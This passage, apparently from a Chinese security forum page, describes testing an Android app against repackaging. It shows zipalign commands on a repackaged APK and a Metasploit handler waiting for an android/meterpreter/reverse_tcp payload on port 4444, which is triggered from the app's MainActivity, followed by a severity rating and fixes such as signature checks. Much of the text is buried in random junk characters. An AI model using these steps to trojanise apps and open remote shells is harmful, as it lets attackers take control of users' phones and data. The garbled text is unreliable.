; z" y+ Q2 Q' j' E6 `" Q ) b L* S* k% m3 H, D2 x 对齐 " j$ f3 N5 M7 }3 f, l1 x9 G 1 [# G- U/ z. `9 z5 B$ ~

$ L& o; k- i5 S! j 9 p) m. J9 a+ U. i% q 字节对齐优化 ; g! |) [" U; B* g 1 W6 V1 M& ]8 c" T$ z& F

, [! d& C- Q9 Y5 o% }9 x# U2 t/ `5 o) `( |3 e0 X8 ]! P5 L# E* r zipalign -v 4 repackaged.apk final.apk ; H4 Z* W4 ?$ G# l; X% u6 `' H6 l- a7 _ j" ^

! [# ]+ z7 t* S2 w }" v 0 E, |) t- S9 h+ }5 K 检查是否对齐 + @2 j% t( L# Q8 D7 A& M 9 _: t8 q4 J# m' f0 ^

6 }8 O! X2 T& j$ \ : ]' v: S- @4 |' X zipalign -c -v 4 final.apk " x" G+ ^2 o6 A9 i " x2 X e- k+ E4 X

$ a4 T0 N! g& Z2 ~' ^# J ' c# f6 S6 e' J* S z 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 - R' Q* R( q! _9 {1 Y' A5 |' a7 {- y9 q ' f; t( p$ V9 d# A5 a9 u

, F. D! A* [; h$ V 2 X0 V# ~8 }! d. ^8 G0 j 启动Metasploit控制台，配置参数等待上线 + ^3 s# ^/ n% t 4 V, r/ s& F3 z" x5 E/ M z

j( J/ s( I1 C' f) N5 J- g- x* `5 y0 `# n 在终端依次输入如下命令 + a. [. m4 u8 E/ a& O; s4 f * y# {9 w: o: k

% w: Z4 W2 T! D: T$ S( G - G9 e0 p! U/ Q: P" @ msfconsole 5 D: _! X2 G, I' o# ?: I/ | 6 y- o0 q5 s4 [1 I5 T* k% N

I/ G! G$ n" j, `7 [1 t k4 Q& G; i, }6 K/ ~( { use exploit/multi/handler 8 [6 Z% z: x1 Y a- G* t) V 5 G. d4 F9 y( e+ p% _5 D

. F( A" [' z' a0 ` 3 ^" ] |6 R& X) X set PAYLOAD android/meterpreter/reverse_tcp $ K. {1 l9 e! g+ O# u 6 s: L5 z, r0 Q4 }/ G4 D D

% m3 @5 B! m8 B' M) S, S" Z 3 d1 t- J1 a! p' V set LHOST 192.xxx.xx.xx ! E0 t: n+ }6 v/ E 4 v" o9 P1 f9 u) k0 |

# Q5 W: I6 j. g1 a7 u g! x7 I . }: _- g9 r' t% D D$ l; u% u# y/ P set LPORT 4444 9 Q" E/ C V' N! e ~- D& Y$ @

: g* v7 w I3 G" A2 Q2 p ! b% D5 X; E3 ^# Q' ^. w6 s m exploit 8 ] j: K1 h2 ]3 ? 8 V1 `9 T- w- v/ u

~: r f) M' W$ v E# c5 b , `3 R. U- U; S% R" F$ P& \ 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： / t6 n1 w) s- d4 p5 _, z7 B : E7 Z& [4 m/ e- ?! i' _

% T" v' ?9 P9 w9 l3 W 4 D8 I/ s0 p- G" Y ]; z 漏洞危害：中 - g1 b( y+ L* o) I # [/ D t. {* U; d3 [% }# s. Q5 [

- i2 q1 R% J; i * H5 g9 g6 u3 W6 m: s! K ; y) L# i: ?, l$ h$ I& T9 {! S2 J* x$ n- @ 严重程度 + a' e/ ?* a/ z! S8 v2 s* H* j; F ( Q! ~' T( H2 Z3 { Q3 b$ h7 x3 [) }	- V# W. F) H3 l- c' F5 \ " \' O# [1 Y" E0 s* n 5 t( ]2 ~$ t8 I4 Q* c( \9 J 8 l" \1 m& U2 z, m; J8 [4 z 高 ; F; w: I# u ?; s' h: I" v 1 P2 a# Z4 }: v% \/ s# e! ^ Y% ~ % h p* @4 b8 Y, R# \| 7 g3 q6 c( ?1 R	1 e* F5 m) o/ Z5 g ! x1 ~0 \|+ g& U5 v/ Y7 I* @+ o 4 D' M; g: n5 }/ K1 t- o C/ p( I" B5 B ■ ! q' {1 D6 o4 B& E5 `! b- k : h+ D y1 ]) E) a! j 6 a5 P5 @! m! c! g9 X _# j+ J) Y 3 @0 V0 K( y( T4 S) ]! O4 \|, Z- D4 H	% g7 u( e/ q8 R1 {1 K/ v+ q# p2 {0 r# T+ r3 @5 m& o / ~: o) e$ I" }- Z, H) `4 \|/ E7 k$ D 中 & w: H: d" Z- B0 ]+ a) u 3 Y0 q0 y( t: A" R* v+ y ; y) b& Z2 F+ B0 @: a# {, O3 y n Z% ^2 i& O- d7 Q	7 s: } T5 c. M6 G; o) o / e7 y+ w' N, t. O( { q9 v/ n1 l5 R* Z7 o& u' o 0 q$ m! N/ C! l/ B$ b ; O: B6 N$ E0 K, A! A+ [ 2 K- A% K" B9 K3 R! r& O1 n 0 j7 F. Z, A9 S" o3 b" q ; m$ ]9 o# J9 S5 P8 u" Z6 J 7 q( \0 ^3 X4 H. B" i) \|# b* y1 S# @% ?2 k- W K	& F& e2 F% M9 J; K' \| ! n& I! }* z' _, y 4 [! N: I) [# j# c , B: x$ @( S8 D# a3 _3 Z 低 : E. c6 Y6 a# f/ o2 M3 ?0 L* u3 h1 y& ]* c/ j( g; ?% H ( w) q. g! B% i+ h: Q; Z3 q" ]3 X" y& f4 J3 f# ]% L6 w. r	9 i$ e# J* ^; r+ d& t - }* q, P0 t+ s+ Q$ H9 p7 F, D % @3 M" X) _- N" S& C# L. o& B) y% q0 s6 S# x / s5 P7 `$ E' @, _! ^+ X0 j: x. {0 q) j* b' m& T- s- g ' N! ]* T; e' i9 N( k: ^6 D5 N1 A8 O, U \. B# A1 S! o3 ^ / \|3 f3 l5 H# s4 D% f" r % ?3 I0 m3 Y1 U0 M

0 w, M5 |" @; ~% T . H* Q y- o+ \$ Y ( o, C/ O5 {3 w2 m3 \$ r J4 `" u. q- ] ( ]5 s! a2 Z- h3 {! ^

% i0 d- @; v; O f 2 E6 i! B" P0 O 修复方法： ' e3 M3 H+ Q: n. P5 b1 d8 a ; d: B: u! Q, g$ x0 r, n& p; @, l% c

5 V( s' x+ A d, C ! X* q/ x2 c, |$ \ 1.在 APP 启动时应做签名校验防止二次打包。
* X' P4 x4 T6 ]8 ]7 L 7 G7 q' W0 n6 o, }( d& C7 b 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ; Z4 `/ L2 S ?+ N* z1 ? 0 @% x$ X: U5 ^+ p" z

8 c# k/ ], }/ {: N ) u$ ]% N5 M% V - j$ e! c) o h: N; `; G9 k ( u! ~- p! A" n! U* [! |+ F

/ b2 P8 b% K) Y' |) F+ P4 u / P0 S: `9 z" I' z" ?, ?
4 I J9 R0 c0 W' K% @7 F1 y- a: L# ] T' k

		自动登录	找回密码
密码			立即注册